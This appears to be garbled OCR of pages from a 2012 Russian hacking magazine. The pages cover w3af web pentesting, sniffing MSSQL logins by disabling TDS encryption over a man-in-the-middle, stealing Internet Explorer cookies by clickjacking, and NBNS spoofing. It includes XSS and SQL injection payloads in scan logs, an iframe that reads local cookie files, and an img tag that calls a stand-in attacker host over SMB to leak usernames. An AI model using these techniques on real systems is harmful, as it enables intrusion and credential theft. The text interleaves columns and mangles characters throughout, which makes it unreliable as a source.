Те стовое веб-nриложение обладает следую щ ими свойс тв ами:

основано на

LAMP ILinux-Apache-M yS QL-PHPI;

имеетфункцию n оиска и сервис nрив атных сообщений;

др у ги х.

З.

СКАНИРУЕМ ВЕБ-ПРИЛОЖЕНИЕ

реализованный в виде модуля webSpideг. Оisсоvег у -плагины за пу­

Gгер-nлагины nросты, но в тоже время очен ь nолезны, как и из в ест­

nолноценный достуn к функционалу nриложения nредоставляется

ная UNI Х-ут илита , в честь которой они на з ваны . Смысл та кой: через

только заре гистрир ованным и авторизова нны м nользователям;

gг ер -nлагин nро хо диткаждая пара НТТР -зап р ос/от вет, в которой nроизводится nоиск интересующей на с информации !номера

актив н оис nоль зуетАJАХ;

кре дитны х карт, вн утренни е IР -ад р еса, а др еса элек тронн ой nочты

и т. n.l. Эти nлагины также умеют искать учас тки nотенциально

имеет, черт nобери, уязвимости!

ХОЛОДНЫЙ ЗАПУСК

onacнoгoJavaScгipt-кoдa, наnример :

Для начала давай nросканир уем наше веб-nриложение без авториза­

document.write document.location eval

тр и, но это n ока небольш ой сюр nр из) и н терфейса:

ции- nросто натравим на него сканер. В wЗa f есть два ! в ообще, уже

gtkUi - графический, основанный на тулките GTK; consoleUi - хакерекий Ul для консольных старожи лов !конечно же, с удобным авто за вершением кома нд) .

4.

П од об ны е участки кода часто создают nредnосылки для р еа­

Будем исnользова ть nервый из них. Для заnуска GUI-версии на­

ли за ции атак вида ООМ based XSS l www. owasp . oгg/ i ndex.php/

бираем в консо ли <<./wЗaf_gui>> и видим что-то nо хожее на изображен­

DOM Based XSS).

ное на ск р иншоте

Вгu tеfо гсе- nлагины , как можно догадать ся, nроизводят nеребор

nр офиль, цель, nлагины и тулбар. Немн ого расскажу о nрофилях.

значений для ме х анизмов аутентификации НТТР

1. Гл авное

окно раз д елено на несколько секций:

Basic и для обыч­

ной формы для лаги на . Наnример , nлагин foгmlogin автоматически L.

детектир уетформ ы в хо да по сод е ржани ю в ни х двух nараметро в, о дин из которых им еетти n passwoгd. По сле об наруже ния тако й

формы сразу начинается б р ут.

5.

Аttасk-nлагины nредназначены не для nоиска брешей, а для их

экс пл уата ции. Они, как и др угие аддоны, используютобщую базу знаний о те ст ируемом nриложении, в ча с тности , они используют ин­ формацию о найденныхуязвимастях и пытаются их пр оэкс nл уати ­ ровать . Да-д а, именно эти nлагины могутnомочьдобыть заветный

••

.......

..

-

..... .. ...._.

ш е лл на бажном сервере. ;l

6.

Маnglе-nлаг и ны nозв оляютнал ету менять что-нибудь в за nро сах

ХАКЕР

03/158/2012

Структу р а в еб-nриложения

01,9


PCZONE

.

:::--CniМSiRSaiplngwMЬniC~JI'CГ. UJinO НПP 11181adGE1. f l'leS811diiiiW8S:

"limt= 15&\PCSCIFТ~Н")<ISC<Pf .... ть. ml)(thcl'*-wuv Tnisdnt!abllotyateasAU.Ьrowsen.. Тtis.,._~...asloundO'INNCf,IИIWiflid!905.

. ... C/OIIIillla!IID/III~ • • c-•.er~p~orq...._.ы~o~r

.. .. ""&""'"".-- - - Результаты сканирования wЗaf

Использование прокси-утилиты в wЗaf

Как можно догадаться, эт о именованные наборы настроек, которые

Suite,

можно загружать в wЗaf. П о сути, это in i-файлы, в которых ты можешь

«nо льзовательские прокси>> позволяют в реальном времени о т слежи­

сохранять nолюбившуюся тебе конфигурацию wЗaf, в том числе те­

вать [и даже изменять! НТТР-трафик между веб-браузером и веб­

стируемый

сервером. Конечно, подобный инструмент есть и в комплекте wЗaf.

URL,

выбранные и настроенные плагины, саге-настройки

и многое другое. Например, для сканирования ltteг я создал простой

или даже популярного аддона к Fiг efox - Таmрег

Data.

Такие

Вернее, такихпроксив нем целых две:

профиль под названием М у Pгofile, далее подключил в нем disсоvегу­

disсоvегу-плагин spideгMan;

плагины webSpideг и

интерактивный инструмент lnteгcepting Ргоху для ручноготестиро­

gгер-плагинов для

вания.

XSS-

pykto [порт знаменитого Nikto на Pythonl, пару поиска DOM XSS и несколько плагинов для поиска

и SQL-инъекций. Ч тобы начать сканирование, нажимаем Staгt

и ждем несколько минут, пока не появятся первые результаты. Кста­ ти, мы всегда можем наблюдать за действиями wЗaf на вкладке

Log,

Для наших целей будем использовать spideгMan, который, как мы

уже разобрались, представляет собой disсоvегу-плагин. П опробуем

куда в реальном времени выводятся информационные сообщения

его в деле. П одключаем плагин в главном окне и запускаем сканиро­

от ядра и п лагинов. Ход процесса отображается через прогреес - бар

вание. В веб-браузере в качестве пр окси прописываем

и другие идентификаторы.

[я использую для этого адд он F охуРгоху для F iгe f ox, по зво ля ющий

П ример н о через

минут сканирование завершается. Посмотрим,

20

127.0.0.1:44444

легко управлять проксями и переключаться меж ду ними! . SpideгMan

что удалось найти wЗaf. П омимо ошибок конфигурации Апача и кучи

будет запущен до webSpideг, так что последний сможет использовать

подозрений на

его результаты . Переключившись на spideгMan в нашем браузере, н е­

DOM XSS, сканер обнаружил несколько XSSI Одна из них, в /i ndex.php, представляет для нас особый интерес, осталь­ ные мы пока отложим. Плагин Pykto, в свою очередь, обнаружил доступную страни цу статуса Apache и phpinfo-cкpиnт /test.php. Другие плагины установили название и версию использ уемого веб-сервера

и веб-фреймворка. В нашем случае это

Linux

Apache/2.2.16 на DeЬian GNU/

и язык программировани РНР. Др угая полезная фишка, которая

позволяет нам лучше понять структуру веб-приложения,- это вклад­

ка

URLs с древовидной

картой веб-приложения и ее графическим

представлением. Здесь же можно просмотреть все НТТР-транзакции, сгенер ированные в рамках сканирования.

ПЕНТЕСТИНГ ВЕБ

2.0

Сейчас уже никого не удивишь играми, г рафическим редактором или видеозвонками через веб-браузер. Неотъемлем ой частью интернета стали веб-приложения, в которых логика выполнения запро граммирована на стороне клиента с активным использовани­

ем JavaScгipt,

AJAX, JSON, HTML5

и др угих названий и аббревиатур.

:1 Такой насыщенный комплекс технологий всё сильнее затрудняет автоматизированное тестирование безопасности веб-приложений. Прошли былые времена. Это история уже не о тестировании

обычно г о веб-сайта с множеством страниц вида /aгticle.php?id = 68, на ко т орых, в с вою о ч е р е дь , есть множество ссылок , форм и тому п одобного <<мяса>> для веб-паука. На жа в , как обычно, <Ctгi -U >,

чтобы п осмотреть НТМL-к о д , ты увидишь месиво из огромного куска JavaScгipt и немного тра д иционно г о

HTML. П одобный

много полазаем по тестируемому веб-приложению. В L оg-табе видим:

[Mon 30 Мау 2011 12:08:22 АМ MST] spiderMan proxy i s running on 127.0.0.1:44444. Please configure your browser to use these proxy settings and navigate the target sit e. То exit spiderMan plugin please navigate to http:l/127.7.7.7/spiderMan?terminate . [Mon 30 Мау 2011 12 :15 :29 АМ MST] The user is navigating through the spiderMan proxy. [Mon 30 Мау 2011 12:15 : 29 АМ М5Т] Trapped fuzzaЫe requests: [Mon 30 Мау 2011 12:15:29 АМ MST] http ://localhost /i ndex.php 1 Method : GET [Mon 30 Мау 2011 12:15:32 АМ MST] http://localhost/user-info. php 1 Method: GET [Mon 30 Мау 2011 12 : 22:36 АМ MST] SQL injection in а MySQL database was found at: "http://localhost/user-info.php" , using НТТР method GET. The sent data was: "id=d'z"0". Th is vulnerability was found in the request with id 3911. [Mon 30 Мау 2011 12 :27:10 АМ MST] Cross Site Scripting was found at: "http://localhost/index .php", using НТТР method GET . The sent data was: "limit=15&u=<ScRIPT> a=/UzmE/%0Aalert(a.source)</SCRiPT>" . The modified paramete r was "u" . This vulnerability affect s ALL browsers. This vu lne rabi lity was found in the request wit h id 4042.

«сайт» о ч ен ь

часто не по зубам веб -п ауку, построенному по классической модели.

Как видно из лога, чтобы остановить работу spideгMan, необхо­

Это вообще очень интересное направление для развития средств

димо перейти на специальный адрес, после чего webSpideг и другие

тестирования безо па сности веб-приложений. Ведь непонятно, как

плагины примутся за дело. Так , аудит-п лагины обнаружили

в такой ситуации автоматизированно обойти весь сайт - встраи­

и ХSS-инъекциюl П ервая дыра, оказавшаяся как раз в АJАХ-запросе,

вать полноценные

была упущена во время первого сканирования.

JS

и рендеринг-движки? Использовать подход,

Добавлю немного про эксплуатацию найденных ба го в . WЗaf умеет

подобный Selenium/Web Dг iveг? Дл я тестирования п од обных приложений не обойтись без специализирован ны х прокси, т аких как

050

SQL-

OWASP WebScaгab

и В uгр

эксплуатировать некоторые виды уязвимастей и, к примеру, может предоставить тебе заветн ы й шел л на целевой машине. Для эксплуа-

ХАКЕР

03 /158/ 2012


Фреймворк д ля п ентестера

..

тацииобнаруженнойуязвимостинадопростоперетащитьсоотве~ ствующий эксплоит на вкладке

Exploit

на уязвимость. Д ля эксплуа­

тации SQL-инъекций используется наверняка знакомый тебе

.

---........

РУЧНОЕ ТЕСТИРОВАНИЕ Отправить НТТР-заnрос в нормальной операционной системе можно

в конце концов,

-

sqlmap

[sqlmap.sourceforge.netl, встроенный в wЗaf.

с помощью множества способов: Telпet,

~

cURL, Wget, Python + urll ib,

:1- выбирай, ч т о больше по душе. В wЗaf для этого

предусмотрены специальные удобные инструменты. П ослать пачку однотипных НТТР-запросов с разными значениями одного из пара­

метров? Пожалуйста! Генерировать соответствующие токены можно на том же Pythoп. С помощью редактора НТТР - запросов, в котором есть даже простая п одеветка НТТ Р - синтаксиса, можно отправлять одиночныезапросы . Ч астовозникаетнеобходимостьвыполнить

Пол у ча е мш е лл че р ез S QL-инъекцию

кодирование какой-нибудь строки в

URL или просто посчитать МО5сумму. Конечно, можно быстро набрать «echo -п "admin" 1 md5sum>>

:1 Как ты уже дога­

в консоли, но использовать для этого встроенный кодировщик немно­

Бинго! Обнаружена классическая SQ L-инъекция .

го удобнее. П ри раскрутке очередной слепой SQL-инъекции важно

дал с я , эт о з апускаются всё те же плагины, которые ты выбираешь при

различать между собой ответы веб-сервера , для чего тебе наверняка

об ычном ск анировании.

пригодится встроенный

diff.

Для поиска «слепых>> с кулей тоже есть специальные плагины. Вы­

Ну и наконец, если ты « вайтхат >> или про­

сто аудитор безопасности, то заказчику пентеста надо по казать, как

ключим вывод ошибок в настройках РНР и попробуем задетектить т от

«работает»уязвимост~используявозможностьзкспортазапросов

ж е ба г, но уже вслепую. С помощью НТТР-редактора посылаем пару

в форматы

з апросов к нашему веб-приложению: /useг-info.php?id=1 и /useг-info.

Python. Иными словами , можно сказать: «От­ на жмите .. Сабмит " и смотрите, как появляется

HTML, AJAX

кройте вот эту форму,

и

p h p? id=1 % 2Ы , а затем передаем р езультаты средству для сравнения тра нз акций. В результате при вып о лн е нии SQL-зaпpoca срабатывает

JS-сообщение ... >>

пр ос тейшее алгебраическое выражение, и мы получаем два разных

Р ассмотрим типич н ый сценарий использования этих инструмен­ тов . Запускаем прокси и шаримея по и с следуемом у веб-приложению

отв е та [информация дл я р а зны х польз о вателей!. Дальнейшим шагом

[не забываем включить проксирование трафика в бра у зереl.

м ож ет с тать всё та же э кс пл у атация с к ули .

На вкладке Histoгy видим отображаемый в реальном времени НТТР­

OUTRO

трафик между браузером и сервером. В случае с более мощным при­

ложением, например чатом , транзакций будет значительно больше.

WЗ af- это действительн о мощный фреймворк для тес т ирования

В такой ситуации как нельзя кстати будет хороший фильтр : с его

б ез опа с но с ти веб-приложений . Рас с казывать о нем можно долго ,

помощью можно, к примеру, выводить только транзакции с такими за­

п о этом у я ставил перед с о б о й задач у по казать его в действии.

просами, которые содержат параметры в строке << Запросы>> и на кото­

Важно, что это не прос т о очередной сканер безопасности, а именно

рые был получен 2хх-й ответ.

фр е ймворк, большое количество дополнений тому доказательство. К тому ж е для человека , на базовом у ровне знающего веб и

Вернемся к нашему приложению. Во время навигации по нему

Python,

замечаем, что при наведении на аватар пользователя появляется

не со ставиттруда добавить недостающий функционал или проверку.

всплывающее «окно>> с информацией об этом пользователе. Эта

К с тати , как и любому свободному проекту, wЗaf нужны новые раз­

информация выдается в результате обычно го АJАХ-запроса к

ра б отчики, тестировщики и просто активные пользователи. Кого

/useг-info.php?id = 1, что видно в истории запросов . Давай протести ру­

з т о з аинтересовало, добро nожаловать в соответствующий список

ем этот скрипт на уязвимости. Для нашего запроса в меню выбираем

рас с ылки [ wЗ af . souгce f oгge . ne t l либо на IRС-канал #wЗaf в сети

«Audit

гequest

with ... >>- нас

интересует, есть ли там SQ L-инъекция .

Fг e enode. ::х::

ld:47

ld: 46

LАутентификация J

~~-----..

[ Сбор ссылок

GЕТ http :/Jloca.lhost /u ser - i n fo .~p 7id-1 НТТР/1.1

~

Accept -l.angu•: en-us,en;q-e.s Accept-encodi ng: identity Keep-alive : 115 Accept : text/htlll, арр lication/xhtlll+XIIl, арр licat ion/XIIl: q..e. 9

user-agent : Нozilla/S.e (Xll; Linux i686; rv:2.&.1) Gecko/Z81 Accept -charset : IS0-8859 - l, ut f -8; q-e. 7, • ;q-e. 7 Нost: localtюst

Refe re r: http://localhosttindex.php Cookie: PНPS ESSI D-гf 7vdbs j ist7is3j6 rlc3p462S

Proxy- connect i on; keep- а li ve

~GЕТ h t tp ://loc al ho s t t u ser- in fo. php 7id· 1~Bl НПР/ 1 . 1

Accept- l anguage: en-us,en;q-e.S Accept-encoding : identity Keep-alive: 115 Accept: text/ht.l,application/xhtii\+XIIl ,application/xlll ;q..e. 9 , .-, . ;q-8.8 User-agent: t10zilla/S .8 (Xll ; Linux iб86; rv:2.8. 1) Gecko/28118438 Firef o Accept -charset: IS0-88S9· 1,utf -S; q-8. 7, • ;q-e. 7 Нost: localhost Referer : http://l ocalhos t /index. php Cookie: PНPS ESS I D• rf 7vdbs j ist7 is З jбrlcЗp462S Proxy-connection: keep-alive <style>

<style>

"' (height:

"'( height :

ерх; Ьorde r : 8рх; Ьorder-top:

</ style> <tаЫе Ьo rde r- " 8 "

<tа Ые Ьогdег-· е· с е\ \sp<~c i ng- " S " c\ass-· userТaЫe">

~ <1: Г><t d> Fi rs t natlf!: </td><td>Jaii'IE!s</td></t r> <t r><td>Las t na~~e : </ td><td>Bond</ td></ t r> <tr><td colspan• "2"><hr />1 like Vodka ... shaken not stirr <t r><td co\s an•"2 "><hr /><а href• "/IIIE!ssages .p_h ?to•jai'IE!s </t r> </table>

1Sellext lo compare J

ХАКЕР

03 / 158/ 20 12

Ipx solid gray;

1

1 </sty\ e>

Модель работы класс и чес к ого ск анера уязвимостей веб - прило ж ени й

ерх;

Ьorder: ерх; Ьorder-top:

l px solid gray;

~

cell spacing•" S" cla s s-~ us e rТaЫ e "> <tr><td>Firstnane: </td><td>A\isa</td></ t r> <1: r><td>Las tnaii'IE! : </td><td>Se lezneva</td></t r> <tr><td colspan•"2"><hr />Spacegir\1 J! !</td></tr> <tr><td cols an•"2"><hr /><а href• " /IIE!ssages . ~h~7to-alisa " >Send Priva </ t r> </tabl e>

[<lo::J o12

Утилита и з состав а wЗ af для сравнения НТТР-т ранз акций

051


ВЭЛОМ/ЕАSУ НАСК

Алексей «GreenDog » Тюри н, Digital Security ltwitter.com/antyurinl

ОТСНИФАТЬ ПАРОЛЬ ПРИ АУТЕНТИФИКАЦИИ В

MSSQL

Ef.3Jf..i!f.·l ъ--

Microsoft SQL server- это

одна из самых распространенных СУБД.

2.

Шифрование доступно , но отключено:

ENCRYPT_O FF- ОхОО. ENCRYPT_ON - Ох01. ENCRYPT_NOT_S UP - Ox02 .

Шифрование доступно и включено:

З.

Шифрование недоступно:

Как и многие другие продукты

Microsoft, SQL server предлагает два вида аутентификации : integrated [sign-on], то есть аутенти­ фикацию п о виндовой у ч етной записи, и native, то есть классиче­

4.

Шифрование требуется: ENCRYPT_REQ-OxOЗ.

скую, по логину и па ролю. Оба способа используются довольно

тря на название, шифрование при таком значе нии используется,

часто.

но только для процесса . А вот когда стоит

По дефопту данные, передаваемые по сети, практически

шифрование не используется совсем. Таким образом, мы вполне

не шифруются. Если точнее, то шифруется процесс аутентифи­

можем осущест вить классическую МiТМ-атаку и, подменив данные

кации пользователя, а сами данные- нет. Конечно, для атаки

всего лишь в одном па кете, полностью отключить шифрование

этого было бы достаточно. Зачем нам логин и па роль, если мы

и отснифать аутентификационные данные.

Давай рассмотрим две ее особенности.

1.

1. 2.

г

По дефопту устанавливается значение

ENCRYPT_O FF.

Несмо­

ENCRYPT_NOT_SUP,

Кстати, автор этого исследования довел всё до логического

можем на лету поменять запрос или получитьданные , всего лишь

устроив arp-spoofiпg между сервером и клиентом? Затем, что это

конца - создал модуль для

не самое про стое дело - подменять что-то на лету. Поэтом у по­

за нас и сделает. Только , думаю, з десь стоит отметить одну особен­

Metasploit Framework,

который всё

ность. В описываемом случае модуль не меняет данные на лет у,

пытаемся вытащитьлогин и пароль.

а поднимает ТСР-порт, и только с него данные редиректятся

Не так давно некто под ником fOrki изучил этот вопрос [!J.i.LЬ'L s8g07r l. Посмотрим, что же он выудил. Дл я начала то, что дан­ ные MSSQL передаются в форма т е Tabular DataStream protocol

на MSSQL-cepвep за счет еще одного соединения, созданного уже атакующим, что, тем не менее, не создает особых проблем. Всё, что

требуется, - з т о организовать редирект трафика, приходящего

[ bit . ly/z З oVPR I. Н о сам этот пр отокол не поддерживает шифрова­

на хост атакующего после arp-spoofing-aтaки, на соответствующий

ние . Как же так? Откуда зашифрованные п акеты авторизации?

локальный порт. Но и эту за дачу

После непродолжител ьны х мучений с

в свой модуль небольшой shеll-скрипт.

Wireshark fOrki

обнаружил

автоматизировал, добавив

fOrki

довольно интересную вещь: для шифрования здесь использу­

ется обычный

SSL [с самоподписанным сертификатом], который TDS . Нестандартное решение. Но это не так

-----

-

- -

--

-

-

~--------

работает вн утри

важно. Самое интересное- это настройка ТDS-соединения, так называемого пакета

PRELOGIN . Он

-

-----

задает разнообразные

настройки и в том числе указывает, будет ли использоваться шифрование. За шифрование отвечает поле рое может принимать сле д ующие значения:

052

- - -

ENCRYPTION,

кото­

------------

-

-

- - - -- - - - --

Выбор метода на основании флагов, установленных у клиента и сервера

ХАКЕР

03/158/2012


EASY

УГНАТЬ КУКИСЫ С ПОМОЩЬЮ

UI-REDRESSING

НАСК

......... ·Jйи г

В декабрьском номере][ мы познакомились с такой вещью, как

clickjacking.

о -·

Сrатья была очен ь полезной, но автор не упомянул об

одном замечательном трике. На самом деле название

т

~ Р - ~ - G~ ·

Adcms iQ c:'iOocunert:sns.ttnat~

clickjacking ui-

не совсем точно отражает суть атаки, и мне кажется, что

это более правильное nонятие. И техника , которую я

redressing -

.,_

опи ш у ниже,- самое яркое т ому подтверждение.

Итак , n озволь представить тебе технике рассказал

cookiejacking. Впервые об этом Rosario Valotta на HITB в Амстердаме в 2011

7iS9l003 .Z<19775128.132514ИЭ9 .132 . account.в .9CJ09le. соа/ >600

году. Потенциал техники огромен- nросто пред с тавь , что с ее по­

888086656

мощью можно nо хи тить куки от люб о го сай та , даже от защищенно­

ll3080 1SS Z

30191238

го НТТРS-протоколом! Однако здесь есть небольшее ограничение :

работает она только в

о

D

IE !но зато во всех версиях! . Теперь давай

Во-первых, он использовал

IE.

0-day,

которая имеется во всех

С виду это не такая уж и с трашная дырка, а потом у ее

не особо стремились пропатчить. Как ты уже знаешь, в

st..edDotunerts

~ Мy((ЩIII:et"

_,;j...,__."""

посмотрим, что же п редлагает нам этот И Б-специалист.

версиях

.....- .

IE

Об х од кр осс- зон но й политики и доступ к локальным кукисам из зоны интернет

есть

узлы. В разных зонах действуют разные настройки безопасности.

Rosa rio это мячик! в другой !сетка!. Под мячик мы прячем наш iframe с кукисам и, а на самом

Н аn ри мер, описанная выше автоматиче ска я NТLМ-а утентфикация

сайте создаем обработчик для переносимых данных. Н о и это еще

такая фича, как разделение на зоны:

д ейст вует дл я уз лов зоны

lntranet

lnternet, lntranet,

доверенные

и выше. Вот сnисок зон, отсо­

- перетащить один элемент !в пример е

не всё . Нашему

iframe

мы добавляем свойство

scrollspeed

с большим

значением. Это необходимо для того, чтобы клик, совершаемый

ртированных в nорядке уменьшения привилегий:

пользователем, превращал ся в о перацию выделения за счет само­

стоятельного перемещения lпроскролливанияl

Local Machine Zone Local Intranet Zone Trusted Sites Zone Internet Zone Restricted Sites Zone

iframe из самого

верха в самы й низ. Таки м образом, получается, что пользователь во время клика на самом деле выделяет текст в мячик в корзину, перемещает это т текст

iframe, а перемещая drag & dгор'ом, в итоге пере­

давая текст хакеру. Возможно, что на словах всё это звучит не очень понятно, но как только ты посмотришь видео на сайте

Rosario Valotta

С безо п ас н ос т ью и зонами связан еще один момент- правила

I Ьit .l y/iN xvT Ь) , то сразу поймешь логику метода и, в частности, техни­

кросс-зон ног о взаимодействия. Согласно самому общему прави­

ки сопtепt extractioп, даже если ты не знаком с

с более привил егированной . Та ким образом, вызов кода

<iframe

JavaScript.

Думаю, что теперь общая идея атаки ясна . Однако у нее есть

лу, ме н ее привил егирован н а я зо на н е может взаимоде йствова ть

несколько нюансов. Во-первы х, эта атака работает на всех ОС

кук и. Таким образом, на стра ниц у сайта зоны интернет можно

Windows, что и создает проблему :1. Файлы кукисов в ХР и в Vista/7 лежат в разных местах . Для ХР это C: //Documents and Settings/%user_name%/Cookies, а для более новых версий винды -C: /Users/% user_name %/AppData/Roaming/Microsoft/Wi ndows/ Cookies. Тем не менее, э т а « проблема » решается достаточно просто,

встав ить с лед ую щий фрейм:

ведь большинство браузеров отправ л яют в каждом за пр осе заголо­

src= "file: // c :/boot . ini " >

со страницы зоны интернетприведет

к ошибке дост у па. Уязви мость

0-day

состоит в том, что кросс-зонная политика

не действует для оnре д елен ны х файлов, а именно для файлов

вок User-Ageпt, который очень часто включает в себя и версию ОС.

<iframe src= "file :///C: // Documents and Settings / %user_name%/Cookies /%user_name%@google[l].txt " > </iframe>

Кроме того, для опре дел ения версии ОС можно воспользоваться тем же

JavaScript.

Во-вторых, как ты , я д умаю, заметил , нам необходимо

знать имя пользо вателя на его компьютере, и это главная про­

Здесь % user_ пame % - это имя пользователя в ОС. Куки же

блема. Для ее решения можно попытаться заставить пользователя

у каж дог о п о ль зователя свои, п оэ то му хра нят ся они в личных п ап­

подключиться по протоколу

ках . Пр и мер, иллюстрирующий чтение кукисов

передает имя пользователя наряду с другими полями. Дл я этого

Google,

ты сможешь

SMB.

Пр и подключении по н ему клиент

на ядовитую страни ц у требуется добавить вот такой простейший

уви деть на скриншоте.

Во-вторых , кроме 0 -d ау - бага, автор использовал специальную

extraction lпредстав ­ лена П олом Стоуном на BlackHat Europe - 2010, goo.g i/ZBYNw l. Зачем? Хо тя мы и подгрузили в iframe файл с кукисам и, однако

кoд:<img

технику clickjackiпg·a под названием conteпt

src= " \\attac ker.host.com\ any . jpg" ></ img >.

Конечно, еще потребуется поставить обработчик запросов

на

445

порт, а затем организовать его взаимодействие с wеЬ ­

сервером. Как видишь, описанный метод просто шикарен! Однако

получить д ос т у п к данны м в н ем мы не можем. Здесь д ействует

возможности е г о использования чаще всего огра н ичивает филь­

кросс-д омен ная политика , ведь наш сайт находится где-то в сети,

трация такого трафика на сетевых устройствах . К тому же з д есь

а в

встает еще одна проблема. На дворе уже весна 2012-го, а

ifram e у

нас сидит

localhost

пользователя.

Суть этой специальной т ех ники достаточно проста. Все совре ­ менн ы е браузеры поддерживают

drag & drop,

с п омощью которого

пофиксила у язвимость в

Microsoft

IE

Microsoft

еще в начале осени 2011-го. Кроме того,

внесла изменения в наименование кукисов в файловой

пользователь может перенести данные с о дног о сайта на др угой .

системе. Теперь их названия лишились п о н ятного удобочи т аемого

Таким об ра зом, юз е р , по сут и , копирует данны е в о дн ом месте

вида user_пa meradomaiп[couпter].txt и с т али похожи на буквенно­

и вставляет в другое . Кросс -дом е нным п олитикам з д есь придраться

цифровые рандамы вроде 87ТVLB D W.txt. П оэтому обратиться к ним

не к чему. Так вот, сопtепt extractioп - это, проще говоря , несколько

напрямую так просто уже не пол учи тся. Впрочем, по статистике,

извращенный

очень малое число поль зователей заблаговременно обновляет

drag & drop. Заманив

на ядовитый clickjackiпg-caйт

нашу жертву, мы предлагаем ей, например, поиграть в игру. Ее смысл

ХАКЕР

03/158/ 20 12

с вои браузеры, особенно если речь идет об

IE.

053


ВЗЛОМ/ЕАSУ НАСК

СОБРАТЬ ИНФОРМАЦИЮ РЕШЕНИЕ

SkiJJ Tracino Framework

Сбор информа ц ии яв л яется о д ним из важнейших этапов при про­

;\ ' Ift'(' '•\ , 1 1 \

l

J(r~>r

,J 1'l tlll , ' ' , о..; 1'1,

.. t l

"it .._

ведении ауДита безо п аснос т и lну или атаки). Ведь нам необходимо найти самое слабое место и затем попытаться захватить через него всю систему. Но зачем иска т ь сложный путь, если самым слабым местом любой, даже самой защищенной системы является чело­ век? Ты наверняка знаешь о существовании такой замечательной

DNS command Une

вещи, как социальная инженерия. Е е результативность напрямую

***'*

WeЬsfte

зависит от доступной информации о человеке, поэтому тысячи

*** IPNelghЬors

специалистов и проводят различные исследования на эту тему.

***,

Однако в России такой т ен д енции пока что не наблюдается, так

Spamllsts

***•

как наши пользователи си д я т в основном только в Одноклассниках

MaШngllsts

и В Контак т е, д а и про ц есс информатизации еще просто не доше л

***

DNS lnformetion Gathering command line • Flen:e Domllln scan i:J

****; **** • DNSEnumtooi GI ***i • S dlg ~ns.domaln .com domaln.com AXFR ***

• The Н.rvester comm.1nd llne tool Q

Q

Machinespeclflc

до большинства ведомст в . В любом случае я думаю, что тебя за­

интересует ссылка

lntorm•tlon

tools

***;

makensi .es/stf. Автор этой страницы не поле­

нился собрать в одном месте не плохую коллекцию всевозможных онлайн-сервисов, которые могут пригодиться тебе в процессе взлома или пентеста, чтобы получить всю необходимую информа­ цию как о человеке, так и о всей подопытной системе.

О nреде nя ем nлаги ны

WordP res s

НАЙТИ АЛЬТЕРНАТИВУ DNS И ПРОСПУФИТЬ NETBIOS

li•iaf..i!!f.ll т ·лw т

е с ли в файле нет nри вязок, производит запрос к D NS - cepвepy. За ­ Всем нам известно, что для определения IР-адресов по именам

те м

используется протокол

Здесь следует уточнить, что

заботы о безопасности !тогд а существовали более важные зада­

NetBIOS Name Seгvice. NetBIOS входит в Windows по дефолту, а NetBIOS Name Seгvice INBNSI- это тот же протокол, только

чи), поэтому в настоящее время в нем есть множество недостатков

предназначен он для установки соответствия между NеtВIОS­

с точки зрения безопасности . Однако на смену ему идет

именами и IР - адресами. В процессеработы этот протокол либо

ONS.

Протокол проектировался без особой

DNSS EC,

Windows

использует такую штуку, как

и я надеюсь, что си т уа ц ия изменится в лучшую сторону. Сами не­

использует специальный WINS-cepвepa, либо отправляет широко­

достатки

вещательный запрос в сеть !думается, теперь идея атаки понятна).

DNS

наиболее сильно проявляются в локальных сетях,

Но вернемся к еще одному важному моменту- D NS-зanpocy

особенно если мы можем прово д ить атаки типа aгp-poisoning, позволяющие п росматривать и мо д ифицировать трафик, которым

к серверу. Если сервер ответит пользова т елю, то за п рос по

обме н иваются жер т ва и се рв е р . Н о д авай предположим, ч т о

уже не будет отправлен . А как же DNS-cepвepy н е ответи т ь, ес л и

NBNS

по каким-то п ричинам всё э т о нам не д оступно, хотя мы и находим­

интересующий пользователя сайт ХХХ.СО М и м ее т ОN S-за п ись?

ся в одной лока л ке с жертвой . П усть, например, в сетке при­

Здесь мы можем воспользоваться возможнос т ями современных

сутствует некая

браузеров : поиском из адресной строки и подстано в кой доменов

105,

и мы совсем не хотим, чтобы кто-то заметил

нашу хакерскую активность . Тогд а нам нужно действовать тихо,

верхнего уровня

используя только стан д артные возможности протоколов. Уточню

привыкают вводить то, что их интересует, прямо в а д ресную стро­

l.com,

.гu) . Как именно? Сейчас пользователи

задачу. Нам необходимо перехватить куки, передаваемые пользо­

к у, но браузеры не всегда могут понять, хочет ли пользователь

вателем на абстрактный сайт ХХХ.СОМ. Изначально может пока­

что-то найти в поисковике или просто открыть сайт. Е с т ь, конечно,

заться, что задача не имеет решения, но давай рассмотрим, каким

определенные паттерны !например, пробелы в адресной строке),

образом ОС

Windows

но гораздо чаще браузерыв первую очередь резолвя т имя только

определяет IР-адрес сайта. Первым делом

система проверяет статическую привязку

IP к

упомянутым выше способом . Что еще интересней, при отправке

именам, хранящим ­

ся в файле hosts IC : \Windows\System32\dгiveгs\etc\hosts). Д алее,

• FiltEr: J(chs ог No.•

' 1,..

Заnрос

051.

.

48313 . 763879 485 13 . 786589 493 13 . 90'3700 494 13 . 905520 528 14. 65 5488 570 15 . 405637 URL в

...

nros ) and ip.addr

1 Time

1Destnation

1Source ~

DNS-зanpoca к введенной пользователем строке добав л яется

2 123 2 123 123 123

=

Ejp'ession ... Cleat Арр!у 1 ProtDcol

123 2 123 255 255 255

ONS DNS DNS NBNS NBNS NBNS

lmro

. .. .

Standard query response_. NO such Standard query А makaka. stanoard query response, No such Name query NB МАКАКА<00 > Name query NB МАКАКА<00> Name query NB МАКАКА<00>

nате

nате

браузер е nоро ж дает nачку ра з личны х заnросов для резолва и мени

ХАКЕР

03/158/2012


EASY

127 128 162 163 185 186 258 259 319

368.190841 368. 427678 423. 172957 423.407005 442.487183 442:734222 666. 150204 666. 381655 727. 267776

192.168.0.101 192. 168. о. 102 192.168.0.101 192. 168.0.102 192. 168. о. 101 192.168.0.102 192.168.0.101 192.168.0.102 192.168.0.101

192.168.0.255 192.168 . 0.101 192.168.0.255 192.168.0.101 192.168.0.255 192.168.0.101 192.168.0.255 192.168.0.101 192.168.0.255

NBNS NBNS NBNS NBNS NBNS NBNS NBNS NBNS NBNS

92 104 92 104 92 104 92 104 92

Name Name Name Name Name Name Name Name Name

query query query query query query query query query

НАСК

:00> NB ?? response NB 192.168.0.102 NB iiiliiiliiiliiil lliiilll RU<OO> response NB 192.168.0.102 NB .GOOGLE.COM<OO> response NB 192.168.0.102 NB .-RU<OO> response NB 192.168.0.102 NB AASDASD 8188RU<OO>

N B NS- cn yф ин r в д ейст вии

определенный суффикс, в результате чего получается полное до­

4.

Запускаем : run .

менное имя .

Вернемся к краже кукисов. Итак, используя NВNS-спуфинг, мы

